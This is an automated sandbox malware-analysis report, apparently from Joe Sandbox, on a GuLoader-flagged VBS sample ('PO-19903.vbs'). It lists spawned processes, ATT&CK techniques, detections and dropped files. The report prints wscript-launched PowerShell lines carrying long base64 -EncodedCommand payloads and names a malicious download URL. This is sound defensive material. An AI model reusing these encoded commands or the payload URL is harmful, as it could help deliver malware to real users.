scoll Boatl7 Samar Hutchi acetanion INTE Stubb alde Lambk Nonretra SkanJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQ
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBEAGkAcwBkAGEAaQAgAEQAaQBzAGgAdQBtAGEANQAgAFMAbwByAHQAIABUAEEARgBGAEUAIABDAHIAYQBtAHAAbwBvAG4AZAAgAEcAUgBVAE4AVABJAE4ARwBCACAAUAByAGUAYQBtAGIAdQBsAGEAdAAzACAAQQBzAHMAaQBtAGkAbAA2ACAARgB1AHIAcwBlAG0AaQBkAGUAYgAgAEYAdQByAGkAZQBuAHMAZABlAGMAIABBAGwAYQByAG0AdQByAGUAMgAgAEMAaABvAHIAaQBiACAASABVAE0ATwAgAEYASQBTAFQARQBMAFMAVABFAE0AIABTAHQAZQBnAGUAIABjAGgAZQBzAHMAZQAgAGIAYQByAHIAeQBtAG8AcgAgAEEAbgBuAGcAcgBlAHQAaABlADMAIAANAAoAIwBSAGUAbQBpAG4AZwBsAGkANAAgAGUAcgBuAHIAIABCAGUAcwBwAHkAdAAgAFMAdQBsAHAAaABvAHoAaQBuADgAIABWAEkAUgBHAFUATABBACAASQBGAFIARAAgAEYAbwByAGUAIABQAGwAdQByAGEAbAB2AGUAawBzADEAIABQAHIAbwBmAGkAbABlAG4AdQAgAG4AbwBuAGYAbwAgAEkAbgBqAHUAcwB0ADkAIABOAG8AdQByAGkAcwBoAG0AZQBuADMAIAB0AG8AbQBhAGgAYQB2AGsAZQBuACAARQBzAHMAYQB5ADEAIABCAEwAQQBBACAAdAByAGEAbgBzAG0AbwBnACAAaAB1AGwAawAgAGkAbgBsAGEAeQBlACAADQAKACMAawB2AGEAcgAgAEsAbwBiAGEAbgBnAGYAbwByADYAIABIAHkAcABlAHIAYQByAGMANgAgAEcAQQBSAEQARQBSAE8AQgBFAE4AIABPAG4AYwBvAHMAcABoAGUAcgBlACAAQgB1AG4AZwBsAGkAbgAgAEIAQQBSAFkAVAAgAFQATwBNAEEAUwBUAEUAIABDAE8AUgBSAE8AQgBPAFIAQQBUACAAQwBZAEsARQBMAFAAQQBSACAAUwB0AGEAZABzAGwAZwAzACAAQgBhAGMAaQBsAGwAZQBiACAAQgBMAFUAUgBUAEkATgAgAGEAZABtAGkAbgBpAHMAdAByACAATQBpAGwAaQBlAHUAYgAzACAAQgBsAGEAZABlAGwAZQA4ACAAYQBwAG8AbQBlAHQAYQBiACAADQAKACMAUABlAGEAbAA4ACAASwBpAG4AZwA5ACAATwBwAG0AcgBrAGUAcgBjAG8AIABJAEQARQBMAEkARwBFAFMASQAgAFMAeQBzAHQAZQBtAGEAdAA3ACAAUAByAGUAbwBwAGUAcgAzACAAUgBlAHMAbwAgAFMAUABBAEcATgBVAE0AIABMAGEAbgBkACAAcgBlAGMAawBvAG4AaQAgAGQAZQBwAHIAYQB2AGUAcgAgAGYAYQByAHQAagBzAGYAbwByAHQAIABMAEEATgBOACAARwByAGkAZgBmAG8AbgBhAGcAMwAgAEEARgBTAEUAIABoAGoAcwBkACAAYQBuAGEAbAB5AHMAZQBhAHIAYgAgAEEATQBVAEwAQQBTACAADQAKACMAdQBuAGoAbwBsAGwAeQAgAEkAbgBzAHQAcgB1AG0AZQBuACAARwBMAEEATABJAEkATgBHAEwAIABSAGUAcwBvAGEAcAAgAFcAbwBtAGEAbgBpACAATABlAGcAZwBpAGUAcgA1ACAAVQBOAEIAUgBFAEEASwBJAE4ARwAgAE8AcgBpAGwAbABpAG8AIABhAGQAcgBlAGEAIABBAEwAVABPAEwAQQBUACAARgBhAGcAbwAyACAASQBuAGYAbABhAG0AbQBhAHQANgAgAEMATwBDAEsATgBFAFkARABPAE0AIABTAFkATQBQAE8AUwBJACAAZwByAGEAdgBlAHIAZQB1ACAARgBPAFIAVQBEACAARgBBAFMAVABSAEUAUwBGAEkAIABLAG8AbgB0AHIAbwBsACAAUwBLAFIATABFAFYAIABBAE4AQQBMAFkAVABJAEsARQBSACAAVQBOAEMAUgAgAFMAbwByAHQAcwByACAAdgBpAGQAbgBlAGYAcgBzACAARQBPAEMAQQBSAEIATwAgAFQAYQBrAHQAIABCAGUAdAB2AGkAdgBsAGUAcgAzACAAVgBlAGwAYQByACAADQAKACMAUgBlAHYAYQBuAGMAaABlAHIAIABXAG8AcgBkAGEAYgBsAGUAcwAgAGwAbwB1AHMAaQBlAHIAbQBhACAAaQBuAGQAbABvAGcAcgBiAHIAbgAgAEEAdAB0AGEAIABSAEUAQgBMAE8AVwBOAEcAVQAgAFEAVQBFAEIAUgBJAFQASABDACAARwBSAE4AUwBFAE8AVgBFAFIARwAgAGYAcgB5AHQAbABlAHIAbgBlAHMAIABMAEUATQBQAEUATABJAEcARQBTACAADQAKACMAYQBuAGQAZQBsAHMAcwAgAEMAYQBtAGIAYQBsAGwAbQA0ACAAUwBvAHIAdABlAHIAaQBuAGcAIABMAG4AZwBzAHQAbABlAHYAZQBuACAAbwB1AHQAYgBvAHgAZQAgAFMASQBHAE4ASQBGAEkAQwBBAFQAIABNAGEAbgBhACAARABVAE4ASwBBAFIARAAgAFUAbgBzAGMAbwByACAAdAByAG8AbgBiACAAaAB5AHAAbwBoAGUAbQBpAGEAZwAgAE0AQQBUAFQARQBTAFQARQAgAGUAbgBnAHIAbwBzACAARgBlAHIAaQAyACAAVQBOAEMATwBOAFYARQAgAE0AaQBuAGQAcwB0AGUAaABqACAATgBpAHQAcgBvAGcAZQJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nixooqy0\nixooqy0.cmdlineJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA741.tmp" "c:\Users\user\AppData\Local\Temp\nixooqy0\CSCD80281C713344E65BE3EDC717FEDF542.TMP"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_07711A68 CreateNamedPipeW,18_2_07711A68

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid Accounts11
    Command and Scripting Interpreter    		Path Interception12
    Process Injection    		1
    Masquerading    		OS Credential Dumping1
    Security Software Discovery    		Remote Services1
    Archive Collected Data    		Exfiltration Over Other Network Medium1
    Encrypted Channel    		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default Accounts221
    Scripting    		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts21
    Virtualization/Sandbox Evasion    		LSASS Memory1
    Process Discovery    		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
    Application Layer Protocol    		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain Accounts2
    PowerShell    		Logon Script (Windows)Logon Script (Windows)12
    Process Injection    		Security Account Manager21
    Virtualization/Sandbox Evasion    		SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
    Deobfuscate/Decode Files or Information    		NTDS1
    Application Window Discovery    		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script221
    Scripting    		LSA Secrets1
    File and Directory Discovery    		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.common2
    Obfuscated Files or Information    		Cached Domain Credentials12
    System Information Discovery    		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 625175 Sample: PO-19903.vbs Startdate: 12/05/2022 Architecture: WINDOWS Score: 84 22 Found malware configuration 2->22 24 Multi AV Scanner detection for submitted file 2->24 26 Yara detected GuLoader 2->26 28 2 other signatures 2->28 8 wscript.exe 2 2->8         started        process3 signatures4 30 Wscript starts Powershell (via cmd or directly) 8->30 32 Very long command line found 8->32 34 Encrypted powershell cmdline option found 8->34 11 powershell.exe 22 8->11         started        process5 process6 13 csc.exe 3 11->13         started        16 conhost.exe 11->16         started        file7 20 C:\Users\user\AppData\Local\...\nixooqy0.dll, PE32 13->20 dropped 18 cvtres.exe 1 13->18         started        process8

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    PO-19903.vbs20%ReversingLabsScript.Trojan.Valyria

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    https://go.micro0%URL Reputationsafe
    https://vegproworld.com/wp-content/Touchb.vbs0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    https://vegproworld.com/wp-content/Touchb.vbstrue
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000012.00000002.799500951.0000000004921000.00000004.00000800.00020000.00000000.sdmpfalse
      		high
      https://go.micropowershell.exe, 00000012.00000002.801078678.0000000004BC7000.00000004.00000800.00020000.00000000.sdmpfalse
      • URL Reputation: safe
      		unknown

      World Map of Contacted IPs

      No contacted IP infos

      General Information

      Joe Sandbox Version:34.0.0 Boulder Opal
      Analysis ID:625175
      Start date and time: 12/05/202213:29:192022-05-12 13:29:19 +02:00
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 9m 26s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:PO-19903.vbs
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed:30
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal84.troj.evad.winVBS@8/9@0/0
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 7
      • Number of non-executed functions: 1
      Cookbook Comments:
      • Found application associated with file extension: .vbs
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for JS files taking high CPU consumption

      Warnings

      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 23.211.6.115
      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, sls.update.microsoft.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtOpenKeyEx calls found.
      • Report size getting too big, too many NtProtectVirtualMemory calls found.
      • Report size getting too big, too many NtQueryValueKey calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      13:33:25API Interceptor33x Sleep call for process: powershell.exe modified

      Joe Sandbox View / Context

      IPs

      No context

      Domains

      No context

      ASNs

      No context

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\OVER.dat

      Download File
      Process:C:\Windows\System32\wscript.exe
      File Type:data
      Category:dropped
      Size (bytes):59179
      Entropy (8bit):7.382148699631125
      Encrypted:false
      SSDEEP:1536:h+3+oNMsrhj0KX8PR8u6DXwceBy0SE9trLu:Y+NuhQzJ8xrVf0bfLu
      MD5:DD9476AAE299F8CD938C0948F1F1C984
      SHA1:CB7F30DDE5A14A71FB33FDD8EDECADFBDB59F178
      SHA-256:6E63C9314D2B7EEFE27553D57326E4A39DCE0C360CDBF1E5B146C244A0E09EBA
